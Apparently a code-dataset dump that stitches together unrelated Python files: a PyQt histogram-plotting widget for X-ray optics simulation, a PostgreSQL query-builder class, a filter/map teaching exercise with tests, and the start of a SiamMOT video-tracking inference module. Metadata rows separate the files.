if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf.add_histogram_data(histo_data_z_nf)
stats_x_ff.add_statistical_data(histo_data_x_ff)
stats_z_ff.add_statistical_data(histo_data_z_ff)
stats_x_nf.add_statistical_data(histo_data_x_nf)
stats_z_nf.add_statistical_data(histo_data_z_nf)
self.current_stats_x_ff = stats_x_ff
self.current_stats_z_ff = stats_z_ff
self.current_stats_x_nf = stats_x_nf
self.current_stats_z_nf = stats_z_nf
self.add_empty_curves(do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_x_nf,
histo_data_z_ff,
histo_data_z_nf)
self.plot_stats(do_nf,
do_plot_x,
do_plot_z,
stats_x_ff,
stats_z_ff,
stats_x_nf,
stats_z_nf,)
else:
raise Exception("Input Beam with no good rays")
else:
raise Exception("Empty Input Beam")
except Exception as exception:
QMessageBox.critical(self, "Error", str(exception), QMessageBox.Ok)
if self.IS_DEVELOP: raise exception
self.setStatusMessage("")
self.progressBarFinished()
def plot_results(self,
calculation_parameters,
do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_z_ff,
histo_data_x_nf,
histo_data_z_nf,
profile):
if self.ghy_diff_plane == 0:
if do_plot_x:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=1, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
else:
if do_nf:
self.plot_emtpy(88, 0)
self.plot_emtpy(96, 1)
else:
self.plot_emtpy(88, 0)
elif self.ghy_diff_plane == 1:
if do_plot_z:
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=0, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
self.plot_emtpy(88, 0)
if do_nf:
self.plot_emtpy(96, 1)
elif self.ghy_diff_plane >= 2:
if do_plot_x and do_plot_z:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=2, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=3, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
if do_plot_x:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=1, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
elif do_plot_z:
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=0, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
self.plot_emtpy(88, 0)
if do_nf:
self.plot_emtpy(96, 1)
return histo_data_x_ff, histo_data_z_ff, histo_data_x_nf, histo_data_z_nf
def add_empty_curves(self, do_nf, do_plot_x, do_plot_z, histo_data_x_ff, histo_data_x_nf, histo_data_z_ff,
histo_data_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_canvas_stats[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x and do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
self.plot_canvas[1].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[2].add_empty_curve(histo_data_x_nf)
self.plot_canvas[3].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
def plot_stats(self, do_nf, do_plot_x, do_plot_z, stats_x_ff, stats_z_ff, stats_x_nf, stats_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
else:
if do_plot_x and do_plot_z:
self.plot_stat(stats_x_ff, 0)
self.plot_stat(stats_z_ff, 1)
if do_nf:
self.plot_stat(stats_x_nf, 2)
self.plot_stat(stats_z_nf, 3)
else:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
def plot_stat(self, stats, plot_canvas_index, sigma_um="$\mu$m"):
if self.plot_canvas_stats[plot_canvas_index] is None:
self.plot_canvas_stats[plot_canvas_index] = DoublePlotWidget(parent=None)
self.tab[plot_canvas_index][1].layout().addWidget(self.plot_canvas_stats[plot_canvas_index])
self.plot_canvas_stats[plot_canvas_index].plotCurves(stats.get_scan_values(),
stats.get_sigmas(),
stats.get_relative_peak_intensities(),
"Statistics",
"Profiles",
"Sigma [" + sigma_um + "]",
"Relative Peak Intensity")
def plot_histo(self, beam, col, nbins=100, progressBarValue=80, plot_canvas_index=0, title="", xtitle="", ytitle="",
profile=1, offset=0.0, xrange=None):
if self.plot_canvas[plot_canvas_index] is None:
if self.plot_type == 0:
self.plot_canvas[plot_canvas_index] = ScanHistoWidget(self.workspace_units_to_cm)
elif self.plot_type==1:
self.plot_canvas[plot_canvas_index] = Scan3DHistoWidget(self.workspace_units_to_cm,
type=Scan3DHistoWidget.PlotType.LINES if self.plot_type_3D==0 else Scan3DHistoWidget.PlotType.SURFACE)
self.tab[plot_canvas_index][0].layout().addWidget(self.plot_canvas[plot_canvas_index])
histo_data = self.plot_canvas[plot_canvas_index].plot_histo(beam=beam,
col=col,
nbins=nbins,
title=title,
xtitle=xtitle,
ytitle=ytitle,
histo_index=profile,
scan_variable_name="Profile #",
scan_variable_value=profile,
offset=offset,
xrange=xrange)
histo_data.scan_value=profile
self.progressBarSet(progressBarValue)
return histo_data
def check_fields(self):
if self.focal_length_calc == 1:
congruence.checkPositiveNumber(self.ghy_focallength, "Focal Length value")
if self.distance_to_image_calc == 1:
congruence.checkPositiveNumber(self.ghy_distance, "Distance to image value")
if self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_x, "Number of bins for I(Sagittal) histogram")
if self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_z, "Number of bins for I(Tangential) histogram")
if self.ghy_files is None or len(self.ghy_files) == 0 or (len(self.ghy_files) == 1 and self.ghy_files[0] == ""):
raise ValueError("Height Error Profiles list is empty")
congruence.checkStrictlyPositiveNumber(self.ghy_npeak, "Number of diffraction peaks")
congruence.checkStrictlyPositiveNumber(self.ghy_fftnpts, "Number of points for FFT")
def set_progress_bar(self, value):
if value >= 100:
self.progressBarFinished()
elif value <=0:
self.progressBarInit()
else:
self.progressBarSet(value)
    def status_message(self, message):
        # Thin callback adapter: forwards hybrid-calculation status text to the
        # widget's status bar.
        self.setStatusMessage(message)
    def write_stdout(self, text):
        """Append captured stdout *text* to the output text area and keep its end visible."""
        cursor = self.shadow_output.textCursor()
        cursor.movePosition(QTextCursor.End)  # always append at the end of the buffer
        cursor.insertText(text)
        self.shadow_output.setTextCursor(cursor)
        self.shadow_output.ensureCursorVisible()  # auto-scroll to the newly added text
    def setPreProcessorData(self, data):
        """Ingest height-error-profile file name(s) sent by a pre-processor widget.

        :param data: a ShadowPreProcessorData instance, or None to ignore.
        :raises ValueError: if error_profile_data_file is neither str nor list.
        """
        if data is not None:
            if data.error_profile_data_file != ShadowPreProcessorData.NONE:
                # NOTE(review): a single file name is APPENDED to the current
                # list, while a list REPLACES it entirely -- confirm this
                # asymmetry is intentional.
                if isinstance(data.error_profile_data_file, str):
                    self.ghy_files.append(data.error_profile_data_file)
                elif isinstance(data.error_profile_data_file, list):
                    self.ghy_files = data.error_profile_data_file
                else:
                    raise ValueError("Error Profile Data File: format not recognized")
                self.refresh_files_text_area()
def refresh_files_text_area(self):
text = ""
for file in self.ghy_files:
text += file + "\n"
self.files_area.setText(text)
def export_error_analysis(self):
output_folder = QFileDialog.getExistingDirectory(self, "Select Output Directory", directory=os.curdir)
if output_folder:
if not self.current_histo_data_x_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_ff,
stats=self.current_stats_x_ff,
suffix="_S_FF",
output_folder=output_folder)
if not self.current_histo_data_x_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_nf,
stats=self.current_stats_x_nf,
suffix="_S_NF",
output_folder=output_folder)
if not self.current_histo_data_z_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_ff,
stats=self.current_stats_z_ff,
suffix="_T_FF",
output_folder=output_folder)
if not self.current_histo_data_z_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_nf.bins,
stats=self.current_stats_z_nf,
suffix="_T_NF",
output_folder=output_folder)
QMessageBox.information(self, "Export Error Analysis Data", "Data saved into directory: " + output_folder, QMessageBox.Ok)
| true | true |
1c3c89eef599aed04fda4f871c9ab8f8c5f9eedc | 8,653 | py | Python | privex/db/query/postgres.py | Privex/python-db | 3b46b34b4310973e2e2a30a66adaa853fd10340d | [
"X11"
] | 1 | 2019-12-19T13:12:53.000Z | 2019-12-19T13:12:53.000Z | privex/db/query/postgres.py | Privex/python-db | 3b46b34b4310973e2e2a30a66adaa853fd10340d | [
"X11"
] | 9 | 2020-02-24T20:14:53.000Z | 2021-04-30T21:51:04.000Z | privex/db/query/postgres.py | Privex/python-db | 3b46b34b4310973e2e2a30a66adaa853fd10340d | [
"X11"
] | null | null | null | from typing import Iterable, Union
import psycopg2.extras
import psycopg2.extensions
import logging
from privex.db.base import CursorManager
from privex.db.types import GenericCursor
from privex.db.query.base import BaseQueryBuilder, QueryMode
log = logging.getLogger(__name__)
class PostgresQueryBuilder(BaseQueryBuilder):
    """
    A simple SQL query builder / ORM, designed for use with PostgreSQL. May or may not work with other RDBMS's.

    Basic Usage:

    First, inject your psycopg2 connection into QueryBuilder, so it's available to all instances.

        >>> PostgresQueryBuilder.conn = psycopg2.connect(user='bob', dbname='my_db')

    Now, just construct the class, passing the table name to query.

        >>> q = PostgresQueryBuilder('orders')

    You can execute each query building method either on their own line, and/or you can chain them together.

    **WARNING:** many methods such as :py:meth:`.select` do not escape your input. Only :py:meth:`.where` and
    :py:meth:`.where_or` use prepared statements, with a placeholder for the value you pass.

        >>> q.select('full_name', 'address')
        >>> q.select('SUM(order_amt) as total_spend').where('country', 'FR') \
        ...     .where('SUM(order_amt)', '100', compare='>=')
        >>> q.group_by('full_name', 'address')

    Once you've finished building your query, simply call either :py:meth:`.all` (return all results as a list)
    or :py:meth:`.fetch` (returns the first result, or ``None`` if there's no match)

        >>> results = q.order('full_name', direction='ASC').all()
        >>> print(results[0])

    Output::

        dict{'full_name': 'Aaron Doe', 'address': '123 Fake St.', 'total_spend': 127.88}

    You can call :py:meth:`.build_query` to see the query that would be sent to PostgreSQL, showing the
    value placeholders (e.g. %s)

        >>> print(q.build_query())

    Output::

        SELECT full_name, address, SUM(order_amt) as total_spend FROM orders WHERE country = %s
        AND SUM(order_amt) >= %s GROUP BY full_name, address ORDER BY full_name ASC;

    Copyright::

        +===================================================+
        |                 © 2019 Privex Inc.                |
        |               https://www.privex.io               |
        +===================================================+
        |                                                   |
        |        Privex Database Library                    |
        |                                                   |
        |        Core Developer(s):                         |
        |                                                   |
        |          (+)  Chris (@someguy123) [Privex]        |
        |                                                   |
        +===================================================+
    """
    # Executed before every query: force the session timezone to UTC so
    # timestamp handling is consistent regardless of server configuration.
    Q_PRE_QUERY = "set timezone to 'UTC'; "
    # psycopg2 uses printf-style placeholders in prepared statements.
    Q_DEFAULT_PLACEHOLDER = "%s"

    # Cursor class used when creating new cursors (derived from query_mode in __init__).
    cursor_cls: psycopg2.extensions.cursor
    # Default row representation for results (dict rows or namedtuple rows).
    query_mode: QueryMode

    @property
    def conn(self) -> psycopg2.extensions.connection:
        """The psycopg2 connection this builder operates on."""
        return self.connection

    def __init__(self, table: str, connection=None, **kwargs):
        """
        Construct a query builder for ``table``.

        :param str table: the table this builder will query
        :param connection: a psycopg2 connection; if None, the class-level
                           connection (``PostgresQueryBuilder.conn``) is used
        :key query_mode: row format, QueryMode.ROW_DICT (default) or QueryMode.ROW_TUPLE
        :key cursor_cls: optional override for the psycopg2 cursor class
                         otherwise derived from ``query_mode``
        :raises AttributeError: if query_mode is not ROW_DICT or ROW_TUPLE
        """
        super().__init__(table, connection)
        self.query_mode = query_mode = kwargs.pop('query_mode', QueryMode.ROW_DICT)
        if query_mode == QueryMode.ROW_DICT:
            cursor_cls = psycopg2.extras.RealDictCursor
        elif query_mode == QueryMode.ROW_TUPLE:
            cursor_cls = psycopg2.extras.NamedTupleCursor
        else:
            raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
        self.cursor_cls = kwargs.pop('cursor_cls', cursor_cls)
        # Maps each QueryMode onto the psycopg2 cursor class producing that row type.
        self._cursor_map = {
            QueryMode.DEFAULT: self.cursor_cls,
            QueryMode.ROW_DICT: psycopg2.extras.RealDictCursor,
            QueryMode.ROW_TUPLE: psycopg2.extras.NamedTupleCursor
        }

    def fetch_next(self, query_mode=QueryMode.ROW_DICT) -> Union[dict, tuple, None]:
        """
        Fetch the next row of the executed query, executing it first if needed.

        NOTE(review): the ``query_mode`` argument is currently ignored -- the row
        type comes from the shared cursor -- confirm whether it should be honoured
        the way :py:meth:`.fetch` and :py:meth:`.all` honour theirs.
        """
        if not self._is_executed:
            self.execute()
        return self.cursor.fetchone()

    def query_mode_cursor(self, query_mode: QueryMode, replace_cursor=True, cursor_mgr=True):
        """
        Return a cursor object with the cursor class based on the ``query_mode``, using the
        query_mode to cursor class map in :py:attr:`._cursor_map`

        :param QueryMode query_mode: The QueryMode to obtain a cursor for
        :param bool replace_cursor: (Default: ``True``) If True, replace the shared instance :py:attr:`._cursor` with
                                    this new cursor.
        :param bool cursor_mgr: Wrap the cursor object in :class:`.CursorManager`
        :return: the new cursor (possibly wrapped in a CursorManager)
        """
        _cur = self.get_cursor(cursor_class=self._cursor_map[query_mode])
        if cursor_mgr:
            _cur = CursorManager(_cur, close_callback=self._close_callback)
        if replace_cursor:
            # Close the previous shared cursor before swapping it out; failures
            # here (e.g. already-closed cursor) are non-fatal.
            try:
                self.close_cursor()
            except (BaseException, Exception):
                pass
            self._cursor = _cur
        return _cur

    def build_query(self) -> str:
        """Return the SQL string (with %s placeholders) this builder would execute."""
        return self._build_query()

    def get_cursor(self, cursor_name=None, cursor_class=None, *args, **kwargs) -> psycopg2.extensions.cursor:
        """Create and return a new Postgres cursor object.

        A ``cursor_name`` creates a named (server-side) cursor; ``cursor_class``
        overrides :py:attr:`.cursor_cls` for this cursor only.
        """
        cur_cls = self.cursor_cls if cursor_class is None else cursor_class
        if cursor_name is not None:
            return self.conn.cursor(cursor_name, cursor_factory=cur_cls)
        else:
            return self.conn.cursor(cursor_factory=cur_cls)

    @property
    def cursor(self) -> psycopg2.extensions.cursor:
        """Shared cursor for this builder, lazily created and wrapped in a CursorManager."""
        if self._cursor is None:
            _cur = self.conn.cursor(cursor_factory=self.cursor_cls)
            self._cursor = CursorManager(_cur, close_callback=self._close_callback)
        return self._cursor

    def all(self, query_mode=QueryMode.DEFAULT) -> Union[Iterable[dict], Iterable[tuple]]:
        """
        Executes the current query, and returns all matching rows as a list
        (via ``fetchall()``), with each row's type determined by ``query_mode``.

        Usage:

        >>> results = PostgresQueryBuilder('people').all()   # Equivalent to ``SELECT * FROM people;``
        >>> for r in results:
        >>>     print(r['first_name'], r['last_name'], r['phone'])

        :return: a list of rows (dicts or namedtuples depending on query_mode)
        """
        if self.conn is None:
            raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
        if query_mode not in self._cursor_map:
            raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
        # Use a throwaway cursor (replace_cursor=False) so the shared cursor is untouched.
        with self.query_mode_cursor(query_mode, False) as cur:
            cur.execute(self.build_query(), self.where_clauses_values)
            return cur.fetchall()

    def fetch(self, query_mode=QueryMode.DEFAULT) -> Union[dict, tuple, None]:
        """
        Executes the current query, and fetches the first result as a ``dict``
        (or namedtuple, depending on ``query_mode``).

        If there are no results, will return None

        :return dict: The query result as a dictionary: {column: value, }
        :return None: If no results are found
        """
        if self.conn is None:
            raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
        if query_mode not in self._cursor_map:
            raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
        with self.query_mode_cursor(query_mode, False) as cur:
            cur.execute(self.build_query(), self.where_clauses_values)
            return cur.fetchone()

    def select_date(self, *args):
        """
        Add columns to be returned as an ISO formatted date to the select clause.
        Specify as individual args. Do not use 'col AS x'. NOTE: no escaping is used!

        example: q.select_date('created_at', 'updated_at')
        can also chain: q.select_date('mycol').select_date('othercol')

        :param args: date columns to select as individual arguments
        :return: QueryBuilder object (for chaining)
        """
        self.select_cols += ["""to_char({a}, 'YYYY-MM-DD"T"HH24:MI:SS"Z"') as {a}""".format(a=a) for a in args]
        return self
| 42.209756 | 117 | 0.602912 | from typing import Iterable, Union
import psycopg2.extras
import psycopg2.extensions
import logging
from privex.db.base import CursorManager
from privex.db.types import GenericCursor
from privex.db.query.base import BaseQueryBuilder, QueryMode
log = logging.getLogger(__name__)
class PostgresQueryBuilder(BaseQueryBuilder):
Q_PRE_QUERY = "set timezone to 'UTC'; "
Q_DEFAULT_PLACEHOLDER = "%s"
cursor_cls: psycopg2.extensions.cursor
query_mode: QueryMode
@property
def conn(self) -> psycopg2.extensions.connection:
return self.connection
def __init__(self, table: str, connection=None, **kwargs):
super().__init__(table, connection)
self.query_mode = query_mode = kwargs.pop('query_mode', QueryMode.ROW_DICT)
if query_mode == QueryMode.ROW_DICT:
cursor_cls = psycopg2.extras.RealDictCursor
elif query_mode == QueryMode.ROW_TUPLE:
cursor_cls = psycopg2.extras.NamedTupleCursor
else:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
self.cursor_cls = kwargs.pop('cursor_cls', cursor_cls)
self._cursor_map = {
QueryMode.DEFAULT: self.cursor_cls,
QueryMode.ROW_DICT: psycopg2.extras.RealDictCursor,
QueryMode.ROW_TUPLE: psycopg2.extras.NamedTupleCursor
}
def fetch_next(self, query_mode=QueryMode.ROW_DICT) -> Union[dict, tuple, None]:
if not self._is_executed:
self.execute()
return self.cursor.fetchone()
def query_mode_cursor(self, query_mode: QueryMode, replace_cursor=True, cursor_mgr=True):
_cur = self.get_cursor(cursor_class=self._cursor_map[query_mode])
if cursor_mgr:
_cur = CursorManager(_cur, close_callback=self._close_callback)
if replace_cursor:
try:
self.close_cursor()
except (BaseException, Exception):
pass
self._cursor = _cur
return _cur
def build_query(self) -> str:
return self._build_query()
def get_cursor(self, cursor_name=None, cursor_class=None, *args, **kwargs) -> psycopg2.extensions.cursor:
cur_cls = self.cursor_cls if cursor_class is None else cursor_class
if cursor_name is not None:
return self.conn.cursor(cursor_name, cursor_factory=cur_cls)
else:
return self.conn.cursor(cursor_factory=cur_cls)
@property
def cursor(self) -> psycopg2.extensions.cursor:
if self._cursor is None:
_cur = self.conn.cursor(cursor_factory=self.cursor_cls)
self._cursor = CursorManager(_cur, close_callback=self._close_callback)
return self._cursor
def all(self, query_mode=QueryMode.DEFAULT) -> Union[Iterable[dict], Iterable[tuple]]:
if self.conn is None:
raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
if query_mode not in self._cursor_map:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
with self.query_mode_cursor(query_mode, False) as cur:
cur.execute(self.build_query(), self.where_clauses_values)
return cur.fetchall()
def fetch(self, query_mode=QueryMode.DEFAULT) -> Union[dict, tuple, None]:
if self.conn is None:
raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
if query_mode not in self._cursor_map:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
with self.query_mode_cursor(query_mode, False) as cur:
cur.execute(self.build_query(), self.where_clauses_values)
return cur.fetchone()
def select_date(self, *args):
self.select_cols += ["""to_char({a}, 'YYYY-MM-DD"T"HH24:MI:SS"Z"') as {a}""".format(a=a) for a in args]
return self
| true | true |
1c3c8a7b692e56e9ce68e06c8731bc55d8172f00 | 1,565 | py | Python | Beginers/Functions/solution/Functions.py | arunkgupta/PythonTrainingExercises | d260cf71298e34b2a18bd11a76f1764ef28677c7 | [
"BSD-3-Clause"
] | 150 | 2015-11-27T14:19:15.000Z | 2019-11-03T18:34:21.000Z | Beginners/Functions/solution/Functions.py | prmohanty/PythonTrainingExercises | 00a2435649fcf53fdafede2d10b40f08463728fe | [
"BSD-3-Clause"
] | 1 | 2015-12-30T11:41:30.000Z | 2015-12-30T11:41:30.000Z | Beginners/Functions/solution/Functions.py | prmohanty/PythonTrainingExercises | 00a2435649fcf53fdafede2d10b40f08463728fe | [
"BSD-3-Clause"
] | 95 | 2015-12-01T18:44:13.000Z | 2019-10-28T16:25:08.000Z | #!/usr/bin/env python
"""Write an equivalent function to the build in filter() function that takes
a function and a single list and returns a new list of elements where the
function evaluates to true.
Call your function _filter().
For example: _filter(lambda x: x > 0, [1,-2, 3,-4])
(the lambda returns True if x is positive) returns:
[1, 3]
Write an equivalent function to the build in map() function that takes
a function and a single sequence and returns a new list of elements where the
function has been applied to each element of the sequence.
Call your function _map().
For example: _map(lambda x: x.upper(), 'abcdef')
returns:
['A', 'B', 'C', 'D', 'E', 'F']
NOTE: You might want to study the Python documentation for what is meant to
happen when the function is None.
Created on Sep 6, 2011
@author: paulross
"""
import sys
import pytest
__author__ = 'Paul Ross'
__date__ = '2011-08-03'
__version__ = '0.1.0'
__rights__ = 'Copyright (c) 2011 Paul Ross. Copyright (c) 2015 AHL.'
def _filter(fn, iterable):
if fn is None:
return [v for v in iterable if v]
return [v for v in iterable if fn(v)]
def _map(fn, iterable):
if fn is None:
return iterable
return [fn(v) for v in iterable]
def test_filter():
    """Check _filter() against the built-in filter()."""
    seq = [1, -2, 3, -4]
    # list(...) is required on Python 3, where filter() returns a lazy
    # iterator; comparing the iterator object to a list is always False,
    # so the original assertion could never pass.
    assert(list(filter(lambda x: x > 0, seq)) == _filter(lambda x: x > 0, seq))
def test_map():
    """Check _map() against the built-in map()."""
    seq = 'abcdef'
    # list(...) is required on Python 3, where map() returns a lazy iterator;
    # without it the comparison to _map()'s list is always False.
    assert(list(map(lambda x: x.upper(), seq)) == _map(lambda x: x.upper(), seq))
def main():
    """Run this module's tests under pytest; return the pytest exit code."""
    # pytest.main() expects a list of command-line arguments; passing a bare
    # string is rejected by modern pytest releases.
    return pytest.main([__file__])
if __name__ == '__main__':
    # When executed as a script, run the embedded test suite and exit with
    # its status code.
    sys.exit(main())
| 24.453125 | 77 | 0.67476 |
import sys
import pytest
__author__ = 'Paul Ross'
__date__ = '2011-08-03'
__version__ = '0.1.0'
__rights__ = 'Copyright (c) 2011 Paul Ross. Copyright (c) 2015 AHL.'
def _filter(fn, iterable):
if fn is None:
return [v for v in iterable if v]
return [v for v in iterable if fn(v)]
def _map(fn, iterable):
if fn is None:
return iterable
return [fn(v) for v in iterable]
def test_filter():
seq = [1, -2, 3, -4]
assert(filter(lambda x: x > 0, seq) == _filter(lambda x: x > 0, seq))
def test_map():
seq = 'abcdef'
assert(map(lambda x: x.upper(), seq) == _map(lambda x: x.upper(), seq))
def main():
return pytest.main(__file__)
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c3c8acd35a39ee109554ab964e43ce7d532077b | 7,824 | py | Python | siammot/engine/inferencer.py | mondrasovic/siam-mot | f06ce0ba6c80fcfbc3830a38f69c93674d3c74ac | [
"Apache-2.0"
] | null | null | null | siammot/engine/inferencer.py | mondrasovic/siam-mot | f06ce0ba6c80fcfbc3830a38f69c93674d3c74ac | [
"Apache-2.0"
] | null | null | null | siammot/engine/inferencer.py | mondrasovic/siam-mot | f06ce0ba6c80fcfbc3830a38f69c93674d3c74ac | [
"Apache-2.0"
] | null | null | null | import logging
import os
import time
import numpy as np
import torch
from gluoncv.torch.data.gluoncv_motion_dataset.dataset import DataSample
from tqdm import tqdm
from ..data.adapters.augmentation.build_augmentation import \
build_siam_augmentation
from ..data.build_inference_data_loader import build_video_loader
from ..eval.eval_clears_mot import eval_clears_mot
from ..utils.boxlists_to_entities import (
boxlists_to_entities,
convert_given_detections_to_boxlist,
)
def do_inference(
    cfg, model, sample: DataSample, transforms=None,
    given_detection: DataSample = None
) -> DataSample:
    """
    Do inference on a specific video (sample)
    :param cfg: configuration file of the model
    :param model: a pytorch model
    :param sample: a testing video
    :param transforms: image-wise transform that prepares
           video frames for processing
    :param given_detection: the cached detections from other model,
           it means that the detection branch is disabled in the
           model forward pass
    :return: the detection results in the format of DataSample
    """
    logger = logging.getLogger(__name__)

    model.eval()
    gpu_device = torch.device('cuda')

    video_loader = build_video_loader(cfg, sample, transforms)

    # Accumulate tracked entities into a fresh DataSample sharing the input's metadata.
    sample_result = DataSample(
        sample.id, raw_info=None, metadata=sample.metadata
    )
    network_time = 0
    for (video_clip, frame_id, timestamps) in tqdm(video_loader):
        frame_id = frame_id.item()
        timestamps = torch.squeeze(timestamps, dim=0).tolist()
        # Drop the leading batch dimension added by the loader.
        video_clip = torch.squeeze(video_clip, dim=0)

        frame_detection = None
        # used the public provided detection (e.g. MOT17, HiEve)
        # the public detection needs to be ingested to DataSample
        # the ingested detection has been provided, find the details in
        # readme/DATA.md
        if given_detection:
            frame_detection = given_detection.get_entities_for_frame_num(
                frame_id
            )
            frame_detection = convert_given_detections_to_boxlist(
                frame_detection,
                sample.width,
                sample.height
            )
            # Rescale the boxes from original video size to the clip's size.
            frame_height, frame_width = video_clip.shape[-2:]
            frame_detection = frame_detection.resize(
                (frame_width, frame_height)
            )
            frame_detection = [frame_detection.to(gpu_device)]

        with torch.no_grad():
            video_clip = video_clip.to(gpu_device)
            # Synchronize before/after the forward pass so the wall-clock
            # measurement reflects GPU execution, not async launch time.
            torch.cuda.synchronize()
            network_start_time = time.time()
            output_boxlists = model(video_clip, given_detection=frame_detection)
            torch.cuda.synchronize()
            network_time += time.time() - network_start_time

        # Resize to original image size and to xywh mode
        output_boxlists = [
            o.resize([sample.width, sample.height]).convert('xywh')
            for o in output_boxlists]
        output_boxlists = [o.to(torch.device("cpu")) for o in output_boxlists]
        output_entities = boxlists_to_entities(
            output_boxlists, frame_id, timestamps
        )
        for entity in output_entities:
            sample_result.add_entity(entity)

    # NOTE(review): network_time is 0 if the loader yields no frames, which
    # would make this division raise ZeroDivisionError -- confirm samples are
    # always non-empty.
    logger.info(
        'Sample_id {} / Speed {} fps'.format(
            sample.id, len(sample) / (network_time)
        )
    )
    return sample_result
class DatasetInference(object):
    """Run (and cache) tracking inference over a whole dataset, then evaluate it.

    Results are cached per-sample as JSON under ``output_dir`` so re-runs skip
    already-processed videos; tracks are post-filtered by length/confidence
    before CLEAR-MOT evaluation.
    """

